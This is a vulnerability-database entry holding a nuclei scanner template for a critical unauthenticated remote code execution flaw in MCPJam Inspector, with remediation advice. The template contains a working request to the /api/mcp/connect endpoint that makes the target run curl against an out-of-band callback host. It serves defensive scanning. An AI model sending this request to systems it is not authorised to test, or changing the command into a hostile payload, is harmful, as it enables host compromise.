MCPJam Inspector - Remote Code Execution

Published 02 Jul 2026 09:36:57 · Reported by ProjectDiscovery · Type: nuclei · Source: github.com

MCPJam Inspector RCE via /api/mcp/connect; upgrade to 1.4.3 and bind to localhost.

Code
id: CVE-2026-23744

info:
  name: MCPJam Inspector - Remote Code Execution
  author: Louay-075
  severity: critical
  description: |
    MCPJam Inspector is a local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE): an attacker can send a crafted HTTP request that triggers the installation and launch of an attacker-chosen MCP server command, leading to RCE.
  impact: |
    An unauthenticated attacker can remotely execute arbitrary system commands via the exposed /api/mcp/connect endpoint. Successful exploitation leads to full compromise of the affected host.
  remediation: |
    Upgrade MCPJam Inspector to version 1.4.3 or later. Restrict the service to listen on 127.0.0.1.
  reference:
    - https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
    - https://github.com/advisories/GHSA-232v-j27c-5pp6
    - https://nvd.nist.gov/vuln/detail/CVE-2026-23744
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-23744
    epss-score: 0.38374
    epss-percentile: 0.98384
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: mcpjam
    product: mcpjam
  tags: cve,cve2026,rce,mcpjam,oast,ai,vkev

http:
  - raw:
      - |
        POST /api/mcp/connect HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"serverConfig":{"timeout":10000,"command":"curl","args":["{{interactsh-url}}"],"env":{}},"serverId":"mymcp"}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Connection failed for server", "MCP error")'
          - 'contains(content_type, "application/json")'
          - 'contains(interactsh_protocol, "dns")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a00473045022007d1dd6a40b7b1c810dc7e28bcd373242148f4bc62fcd28dfea9fc96362e381d0221008118e60646ac0428fd554b094d28aa403c2d37290fde9657b94fb4fbcc552f67:922c64590222798bb761d5b6d8e72950


Last updated 17 Jan 2026 14:53
Vulners AI Score: 6.6 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.38374